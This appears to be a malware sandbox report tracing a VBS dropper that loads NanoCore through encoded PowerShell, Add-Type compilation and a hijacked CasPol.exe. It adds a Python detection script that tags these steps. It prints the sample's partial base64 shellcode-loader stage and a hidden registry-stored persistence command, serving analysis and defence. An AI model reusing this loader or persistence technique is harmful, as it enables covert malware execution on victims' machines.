Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 28_2_086120B1 28_2_086120B1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 28_2_0328B579 28_2_0328B579
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 28_2_07976EC0 28_2_07976EC0
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 34_2_204623A0 34_2_204623A0
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 34_2_20462FA8 34_2_20462FA8
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 34_2_20463850 34_2_20463850
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 34_2_2046306F 34_2_2046306F
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 37_2_203A2FA8 37_2_203A2FA8
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 37_2_203A23A0 37_2_203A23A0
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 37_2_203A306F 37_2_203A306F
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 37_2_203A3850 37_2_203A3850
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process Stats: CPU usage > 98%
Source: IMG 0045434.vbs Initial sample: Strings found which are bigger than 50
Source: C:\Windows\System32\wscript.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: edgegdi.dll
Source: C:\Users\user\AppData\Roaming\11389406-0377-47ED-98C7-D564E683C6EB\DSL Monitor\dslmon.exe Section loaded: edgegdi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: edgegdi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: edgegdi.dll
Source: C:\Users\user\AppData\Roaming\11389406-0377-47ED-98C7-D564E683C6EB\DSL Monitor\dslmon.exe Section loaded: edgegdi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: edgegdi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: edgegdi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: edgegdi.dll
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Section loaded: edgegdi.dll
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Section loaded: edgegdi.dll
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\IMG 0045434.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\kxeayl3s.cmdline
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES1FFF.tmp" "c:\Users\user\AppData\Local\Temp\CSCAB9D447D8E2849BB9EF6D8A3F7C9ADB.TMP"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe
Source: unknown Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c start /b c:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden $Jordrefor=(Get-ItemProperty -Path 'HKCU:\SOFTWARE\AppDataLow\').EPISCLERIT;powershell.exe -windowstyle hidden -encodedcommand($Jordrefor)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden $Jordrefor=(Get-ItemProperty -Path 'HKCU:\SOFTWARE\AppDataLow\').EPISCLERIT;powershell.exe -windowstyle hidden -encodedcommand($Jordrefor)
Source: unknown Process created: C:\Users\user\AppData\Roaming\11389406-0377-47ED-98C7-D564E683C6EB\DSL Monitor\dslmon.exe "C:\Users\user\AppData\Roaming\11389406-0377-47ED-98C7-D564E683C6EB\DSL Monitor\dslmon.exe"
Source: C:\Users\user\AppData\Roaming\11389406-0377-47ED-98C7-D564E683C6EB\DSL Monitor\dslmon.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c start /b c:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden $Jordrefor=(Get-ItemProperty -Path 'HKCU:\SOFTWARE\AppDataLow\').EPISCLERIT;powershell.exe -windowstyle hidden -encodedcommand($Jordrefor)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden $Jordrefor=(Get-ItemProperty -Path 'HKCU:\SOFTWARE\AppDataLow\').EPISCLERIT;powershell.exe -windowstyle hidden -encodedcommand($Jordrefor)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -encodedcommand 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
Source: unknown Process created: C:\Users\user\AppData\Roaming\11389406-0377-47ED-98C7-D564E683C6EB\DSL Monitor\dslmon.exe "C:\Users\user\AppData\Roaming\11389406-0377-47ED-98C7-D564E683C6EB\DSL Monitor\dslmon.exe"
Source: C:\Users\user\AppData\Roaming\11389406-0377-47ED-98C7-D564E683C6EB\DSL Monitor\dslmon.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -encodedcommand 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
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3rumnuxb.cmdline
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESAD7.tmp" "c:\Users\user\AppData\Local\Temp\CSCB1B043D375E64A49ADE1599E795DF7E1.TMP"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\kar5iszo.cmdline
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA6F8.tmp" "c:\Users\user\AppData\Local\Temp\CSC12B2DF4544A1496EA7EB89E07B3D3FC6.TMP"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe
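The process list above records the whole loader chain in a handful of links: wscript.exe launches powershell.exe with -EncodedCommand; that stage calls Add-Type, which is why csc.exe and cvtres.exe appear as children compiling a temporary assembly; PowerShell then starts CasPol.exe with no arguments and uses it as the host for the NanoCore payload (the Yara hits above are all in CasPol.exe memory). Persistence is registry-resident: cmd.exe runs PowerShell, which reads a base64 blob from the EPISCLERIT value under HKCU\SOFTWARE\AppDataLow and hands it straight back to powershell.exe -encodedcommand, so no script file ever touches disk; the separate dslmon.exe under a GUID-named folder in %APPDATA%\Roaming is the NanoCore drop. The -EncodedCommand argument is UTF-16LE text, base64 encoded; the one on the wscript-spawned line decodes to a C# class that P/Invokes NtAllocateVirtualMemory (ntdll.dll), CreateFileA and ReadFile (kernel32.dll) and CallWindowProcW (user32.dll), the pattern of reading a shellcode file into freshly allocated memory and executing it through a window-procedure callback.

The following is an added example, not part of the sandbox report and not code from the sample or from Joe Sandbox. It decodes -EncodedCommand arguments and tags process-creation events for the links listed above. The events, the tag names, the regular expressions and the three-tag "loader_chain" verdict are the author's own choices; the SAMPLE_EVENTS are constructed to mirror this report's process tree, and SAMPLE_SCRIPT is a shortened stand-in for the real encoded stage with made-up identifiers in place of the original's junk names.

```python
"""Triage of the wscript -> powershell -> csc/CasPol chain seen in this report.

Added example. Input events are dicts with 'parent', 'image' and 'cmdline' keys,
the shape a Sysmon Event ID 1 export gives; SAMPLE_EVENTS below are constructed.
"""
import base64
import re

# APIs the report's decoded -EncodedCommand declares via Add-Type/DllImport.
INJECTION_APIS = ("NtAllocateVirtualMemory", "CallWindowProcW", "CreateFileA", "ReadFile")

# -e / -ec / -enc / -encodedcommand followed by a base64 blob (quoted or bare).
ENCODED_RE = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+\"?([A-Za-z0-9+/=]{16,})", re.I)
# $x=(Get-ItemProperty -Path 'HKCU:\...').VALUE; ... -encodedcommand($x)
REG_STASH_RE = re.compile(
    r"Get-ItemProperty\s+-Path\s+'([^']+)'\)\.(\w+).*-encodedcommand\s*\(\$\w+\)", re.I | re.S)
# Executable under %APPDATA%\Roaming\<GUID>\..., the drop location seen above.
GUID_DIR_RE = re.compile(
    r"\\AppData\\Roaming\\[0-9A-F]{8}-(?:[0-9A-F]{4}-){3}[0-9A-F]{12}\\", re.I)


def decode_encoded_command(cmdline):
    """Return the UTF-16LE script behind -EncodedCommand, or None if absent/malformed."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except ValueError:  # binascii.Error (bad base64) and UnicodeDecodeError both derive from it
        return None


def image_name(path):
    """Lower-case file name of an image path ('...\\CasPol.exe' -> 'caspol.exe')."""
    return path.rsplit("\\", 1)[-1].lower()


def tag_event(ev):
    """Return the set of detection tags for one process-creation event."""
    parent, image, cmd = image_name(ev["parent"]), image_name(ev["image"]), ev["cmdline"]
    tags = set()
    if parent == "wscript.exe" and image == "powershell.exe":
        tags.add("wscript_spawns_powershell")
    if image == "powershell.exe":
        script = decode_encoded_command(cmd)
        if script is not None:
            tags.add("encoded_command")
            if "Add-Type" in script and any(api in script for api in INJECTION_APIS):
                tags.add("pinvoke_injection_apis")
    if image in ("cmd.exe", "powershell.exe") and REG_STASH_RE.search(cmd):
        tags.add("registry_stored_payload")    # stage lives only in a registry value
    if parent == "powershell.exe" and image == "caspol.exe":
        tags.add("caspol_child_of_powershell")  # CasPol.exe has no business under PowerShell
    if parent == "powershell.exe" and image == "csc.exe":
        tags.add("add_type_compile")            # weak alone: Add-Type has legitimate uses
    if GUID_DIR_RE.search(ev["image"]):
        tags.add("exe_in_roaming_guid_dir")
    return tags


def triage(events):
    """Tag every event; 'loader_chain' when the three core links of this report co-occur."""
    per_event = [sorted(tag_event(ev)) for ev in events]
    seen = set().union(*per_event)
    core = {"wscript_spawns_powershell", "encoded_command", "caspol_child_of_powershell"}
    return ("loader_chain" if core <= seen else "inconclusive"), per_event


# Constructed stand-in for the encoded stage: same Add-Type/DllImport shape, shortened.
SAMPLE_SCRIPT = '''Add-Type -TypeDefinition @"
using System;
using System.Runtime.InteropServices;
public static class Stage1 {
[DllImport("ntdll.dll")]public static extern int NtAllocateVirtualMemory(int h, ref Int32 addr, int z, ref Int32 size, int type, int prot);
[DllImport("user32.dll")]public static extern IntPtr CallWindowProcW(IntPtr fn, int hwnd, int msg, int w, int l);
}
"@
'''
SAMPLE_BLOB = base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode("ascii")
PS = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"

SAMPLE_EVENTS = [  # constructed; mirrors the process tree in the report
    {"parent": r"C:\Windows\System32\wscript.exe", "image": PS,
     "cmdline": PS + ' -EncodedCommand "' + SAMPLE_BLOB + '"'},
    {"parent": PS, "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe",
     "cmdline": r'csc.exe /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\kxeayl3s.cmdline"'},
    {"parent": PS, "image": r"C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe",
     "cmdline": r"C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe"},
    {"parent": r"C:\Windows\System32\cmd.exe", "image": PS,
     "cmdline": PS + r" -windowstyle hidden $Jordrefor=(Get-ItemProperty -Path 'HKCU:\SOFTWARE\AppDataLow\').EPISCLERIT;powershell.exe -windowstyle hidden -encodedcommand($Jordrefor)"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Users\user\AppData\Roaming\11389406-0377-47ED-98C7-D564E683C6EB\DSL Monitor\dslmon.exe",
     "cmdline": r'"C:\Users\user\AppData\Roaming\11389406-0377-47ED-98C7-D564E683C6EB\DSL Monitor\dslmon.exe"'},
]

if __name__ == "__main__":
    verdict, tags = triage(SAMPLE_EVENTS)
    print(verdict)
    for ev, t in zip(SAMPLE_EVENTS, tags):
        print(f"{image_name(ev['image']):<16} {', '.join(t) or '-'}")
```

The registry-stash check deliberately matches on the cmd.exe line as well as the inner powershell.exe line, because the Run-key value that restarts the chain (see the autostart signatures in the overview) is the cmd.exe command string; the CasPol.exe rule is the strongest single indicator, since a parameterless caspol.exe spawned by PowerShell occurs in no legitimate workflow.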
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBiAHIAaQBjAGsAIABMAGkAbABsAGkAdABoACAAUABvAHMAdAA4ACAAVABhAGMAdABpAGwAZQBzAGkAIABSAEEARABJAEMAVQAgAFAAYQByAHIAYQBmAG8AdQByAGEAIABTAGUAcgB2AGIAagBlAHIANAAgAEIAdQB0AHQAdwBvADgAIABnAGgAZQBuAHQAIABPAE0AUwBLACAAUwBvAG4AZwBpAHMAaABtAGkAMwAgAEMAVQBQAFAARQBSAFMARABFAFgAIABTAHIAZwBlADkAIABJAG4AZwBuAHUAMQAgAEsAYQBuAGQAZQBsAGEAYgByADMAIABTAGEAcgBvAG4AaQBjACAATQBJAEsARQBZAE4ATwBUAEgAIABOAEkAVABSAEUAUgBJAE4AIABUAEEAQwBLACAAUABJAEcAUABFAE4AQgAgAEIAZQB0AGEAcABhAHIAdAA1ACAAZwBlAG4AaQBvAGgAIABVAGcAZQBzAGsAcgBpAGYAIABCAGUAcwBsAGEAZwBzAG0ANwAgAE4AbwBuAHAAcwB5AGMAaAA5ACAAcwBlAG4AcwBpAHQAaQB6ACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABTAGwAdQBkAHIAZQBjAGgAMQANAAoAewANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbgB0AGQAbABsAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABOAHQAQQBsAGwAbwBjAGEAdABlAFYAaQByAHQAdQBhAGwATQBlAG0AbwByAHkAKABpAG4AdAAgAFMAbAB1AGQAcgBlAGMAaAA2ACwAcgBlAGYAIABJAG4AdAAzADIAIABWAEUAUgBTAEEATABFAFIATgAsAGkAbgB0ACAARgBvAHIAYgBpAHMAdAByAGkAbgAsAHIAZQBmACAASQBuAHQAMwAyACAAUwBsAHUAZAByAGUAYwBoACwAaQBuAHQAIABSAGUAZgByAG0AYQBuACwAaQBuAHQAIABTAGwAdQBkAHIAZQBjAGgANwApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUARgBpAGwAZQBBACgAcwB0AHIAaQBuAGcAIABNAG8AbgBzAHQAcgAsAHUAaQBuAHQAIABNAGUAbABsAGUAOAAsAGkAbgB0ACAATgBvAG4AcABlAHIAYwBlAHAALABpAG4AdAAgAFMAbAB1AGQAcgBlAGMAaAAwACwAaQBuAHQAIABIAEEAQgBBAE4ALABpAG4AdAAgAEIAQQBBAE4ALABpAG4AdAAgAE4AUgBJAE4ARwBTACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAa
wBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABSAGUAYQBkAEYAaQBsAGUAKABpAG4AdAAgAEYAbwByAGIAaQBzAHQAcgBpAG4AMAAsAHUAaQBuAHQAIABGAG8AcgBiAGkAcwB0AHIAaQBuADEALABJAG4AdABQAHQAcgAgAEYAbwByAGIAaQBzAHQAcgBpAG4AMgAsAHIAZQBmACAASQBuAHQAMwAyACAARgBvAHIAYgBpAHMAdAByAGkAbgAzACwAaQBuAHQAIABGAG8AcgBiAGkAcwB0AHIAaQBuADQAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgB1AHMAZQByADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwBhAGwAbABXAGkAbgBkAG8AdwBQAHIAbwBjAFcAKABJAG4AdABQAHQAcgAgAEYAbwByAGIAaQBzAHQAcgBpAG4ANQAsAGkAbgB0ACAARgBvAHIAYgBpAHMAdAByAGkAbgA2ACwAaQBuAHQAIABGAG8AcgBiAGkAcwB0AHIAaQBuADcALABpAG4AdAAgAEYAbwByAGIAaQBzAHQAcgBpAG4AOAAsAGkAbgB0ACAARgBvAHIAYgBpAHMAdAByAGkAbgA5ACkAOwANAAoAfQANAAoAIgBAAA0ACgAjAGMAaQBzAHQAZQByAGMAaQAgAHAAdQBuAGsAdABlAHIAIABUAGUAbQB1ADQAIABQAEEAVABSAE8ATgBFAFMAIABIAGUAcwB0AGUAawAgAFUATgBSAEUARgBPACAAYgBlAGsAcgBhAG4AcwAgAFAAYQBtAHAAcgAgAEcAZQBuAGIAcgB1ACAAZABlAGMAZQByACAAQwByAGUAcwBjAGUAbgB0ACAAVABoAGkAYQBzAHUAcwBpACAAc Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\kxeayl3s.cmdline Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES1FFF.tmp" "c:\Users\user\AppData\Local\Temp\CSCAB9D447D8E2849BB9EF6D8A3F7C9ADB.TMP" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden $Jordrefor=(Get-ItemProperty -Path 'HKCU:\SOFTWARE\AppDataLow\').EPISCLERIT;powershell.exe -windowstyle hidden -encodedcommand($Jordrefor)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -encodedcommand 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
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3rumnuxb.cmdline
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\kar5iszo.cmdline
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESAD7.tmp" "c:\Users\user\AppData\Local\Temp\CSCB1B043D375E64A49ADE1599E795DF7E1.TMP"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA6F8.tmp" "c:\Users\user\AppData\Local\Temp\CSC12B2DF4544A1496EA7EB89E07B3D3FC6.TMP"
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\Documents\20220128
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\TRICA.dat
Source: classification engine Classification label: mal100.troj.evad.winVBS@44/42@38/3
Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini
Source: 20.0.dslmon.exe.b60000.0.unpack, Microsoft.Tools.Caspol/caspol.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 20.0.dslmon.exe.b60000.0.unpack, Microsoft.Tools.Caspol/caspol.cs Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 20.0.dslmon.exe.b60000.0.unpack, Microsoft.Tools.Caspol/caspol.cs Security API names: System.Security.AccessControl.MutexSecurity System.Threading.Mutex::GetAccessControl()
Source: 20.0.dslmon.exe.b60000.0.unpack, Microsoft.Tools.Caspol/caspol.cs Security API names: System.Void System.Security.AccessControl.MutexSecurity::AddAccessRule(System.Security.AccessControl.MutexAccessRule)
Source: 20.0.dslmon.exe.b60000.0.unpack, Microsoft.Tools.Caspol/caspol.cs Security API names: System.Void System.Threading.Mutex::SetAccessControl(System.Security.AccessControl.MutexSecurity)
Source: 26.2.dslmon.exe.bf0000.0.unpack, Microsoft.Tools.Caspol/caspol.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 26.2.dslmon.exe.bf0000.0.unpack, Microsoft.Tools.Caspol/caspol.cs Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 26.2.dslmon.exe.bf0000.0.unpack, Microsoft.Tools.Caspol/caspol.cs Security API names: System.Security.AccessControl.MutexSecurity System.Threading.Mutex::GetAccessControl()
Source: 26.2.dslmon.exe.bf0000.0.unpack, Microsoft.Tools.Caspol/caspol.cs Security API names: System.Void System.Security.AccessControl.MutexSecurity::AddAccessRule(System.Security.AccessControl.MutexAccessRule)
Source: 26.2.dslmon.exe.bf0000.0.unpack, Microsoft.Tools.Caspol/caspol.cs Security API names: System.Void System.Threading.Mutex::SetAccessControl(System.Security.AccessControl.MutexSecurity)
Source: dslmon.exe.16.dr, Microsoft.Tools.Caspol/caspol.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: dslmon.exe.16.dr, Microsoft.Tools.Caspol/caspol.cs Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: dslmon.exe.16.dr, Microsoft.Tools.Caspol/caspol.cs Security API names: System.Security.AccessControl.MutexSecurity System.Threading.Mutex::GetAccessControl()
Source: dslmon.exe.16.dr, Microsoft.Tools.Caspol/caspol.cs Security API names: System.Void System.Security.AccessControl.MutexSecurity::AddAccessRule(System.Security.AccessControl.MutexAccessRule)
Source: dslmon.exe.16.dr, Microsoft.Tools.Caspol/caspol.cs Security API names: System.Void System.Threading.Mutex::SetAccessControl(System.Security.AccessControl.MutexSecurity)
Source: 26.0.dslmon.exe.bf0000.0.unpack, Microsoft.Tools.Caspol/caspol.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 26.0.dslmon.exe.bf0000.0.unpack, Microsoft.Tools.Caspol/caspol.cs Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 26.0.dslmon.exe.bf0000.0.unpack, Microsoft.Tools.Caspol/caspol.cs Security API names: System.Security.AccessControl.MutexSecurity System.Threading.Mutex::GetAccessControl()
Source: 26.0.dslmon.exe.bf0000.0.unpack, Microsoft.Tools.Caspol/caspol.cs Security API names: System.Void System.Security.AccessControl.MutexSecurity::AddAccessRule(System.Security.AccessControl.MutexAccessRule)
